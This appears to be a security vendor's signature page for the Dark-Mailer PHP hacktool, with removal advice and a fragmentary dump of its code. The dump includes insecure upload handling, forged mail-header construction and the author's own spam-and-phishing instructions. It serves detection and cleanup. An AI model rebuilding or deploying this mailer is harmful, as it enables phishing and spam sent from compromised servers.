Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.dark-mailer.001

php.hacktool.dark-mailer.001

Dark-Mailer is a sophisticating mail editor and sender. It allows to send emails form the hacked servers without leaving your real IP address in email headers so it's a perfect tool for sending anonymous emails, phishing and for sending out spam.
Unlike many othe simple mail script, Dark Mailer provides reach editing functionality (formatting, BBcodes, file attachments, automatic substitutions), emails can be sent to a single email and to a list of email. You can also specify web pages
and the script will grab email addresses from those pages

Affecting

Any servers with enabled PHP';
$cleanup='Delete the mailer script and scan your server for other types of malware and specifically for backdoors. Make sure to identy and close the security hole.
You also need to check if your server IP address got blacklisted by various anti-spam blacklist providers as a result of hacker activity.
You can also sign up with us and let our team remove the malware for you.

Dump


<title>Dark-Mailer V.2.2 by p0LYM0rPH2012 / ZyphoMud </title>
...
document.getElementById('About').style.display='block';
document.getElementById('greetz').innerHTML = 'Simply fill out the form and press the "Send"-Button.<br>You can attach a file, which will be uploaded to the server, encoded for the Email and then be deleted from the server(If PHP Safe-Mode is not active).<br><br>If you wish, you can spam around by inserting a lot of Email-Adresses and let the script pass through this list about 1000 times ;). Depence on PHP execution time if Safe-Mode's on!!!!<br><br>If you type "{email}" in the "Subject" or "Message" field the script will exchange it with the Email-Adresse you typed in the "Your Email" field<br><br>You can set the Email to a plain text Email or a HTML-Email(with or without parsing BBCodes)...good for Phishers ;)<br><br>Supported BBCode-Tags: b,i,u,center,img,url,red,blue,yellow,color,size,quote,quote=<br><br>Now you can try out the new E-Mail Grabber. Type an URL and the Grabber will search for E-Mails on the site. The Grabber is Alpha !!!<br><br><br>GreetingZ go out to all DarkenedCore Members. Dedicated to my sweet darling Enigma23-FC ';
...
b_help = "Fat Text: [b]Text[/b] (alt+b)";
i_help = "Cursive Text: [i]Text[/i] (alt+i)";
u_help = "Underlined Text: [u]Text[/u] (alt+u)";
q_help = "Quote: [quote]Text[/quote] (alt+q)";
p_help = "Insert an image: [img]http://Image-URL[/img] (alt+p)";
w_help = "Insert an URL: [url]http://URL[/url] (alt+w)";
s_help = "Font-color: [color=red]Text[/color]";
f_help = "Font-Size: [size=x-small]Small text[/size]";
bbcode = new Array();
bbtags = new Array('[b]','[/b]','[i]','[/i]','[u]','[/u]','[quote]','[/quote]','[code]','[/code]','[list]','[/list]','[list=]','[/list]','[img]','[/img]','[url]','[/url]');
...
if($_FILES["file"]["tmp_name"] != "" && $_FILES["file"] != " ")
{
$UPLOAD = 1;
$Filename = $_FILES["file"]["tmp_name"];
$FilenameMail = $_POST['fakefilename'];
$FileType= $_FILES["file"]["type"];
@chmod("./",777);
move_uploaded_file($Filename, "./$FilenameMail") or die("The file you are trying to upload couldn't be copied to the server. Maybe no R/W Access?");
$content = fread(fopen($FilenameMail,"r"),filesize($FilenameMail));
$content = chunk_split(base64_encode($content));

}
...
$uid = strtoupper(md5(uniqid(time())));
$header = "From: $sendername <$from>rnReply-To: $Replyrn";
$header .= "MIME-Version: 1.0rn";
If ($UPLOAD) $header .= "Content-Type: multipart/mixed; boundary=$uidrn";
If ($UPLOAD) $header .= "--$uidrn";
$header .= "Content-Type: text/$contenttypern";
$header .= "Content-Transfer-Encoding: 8bitrnrn";
$header .= "$Messagern";
If ($UPLOAD) $header .= "--$uidrn";
If ($UPLOAD) $header .= "Content-Type: $FileType; name="$FilenameMail"rn";
If ($UPLOAD) $header .= "Content-Transfer-Encoding: base64rn";
If ($UPLOAD) $header .= "Content-Disposition: attachment; filename="$FilenameMail"rnrn";
If ($UPLOAD) $header .= "$contentrn";
If ($UPLOAD) $header .= "--$uid--";
@unlink ($FilenameMail);
...
</td></tr></table></center>
<center><font color="white" size="-2">Dark-Mailer V.2.2 powered by p0LYM0rPH2012 aka Nemesis23-FC </font></center>
</body>
</html>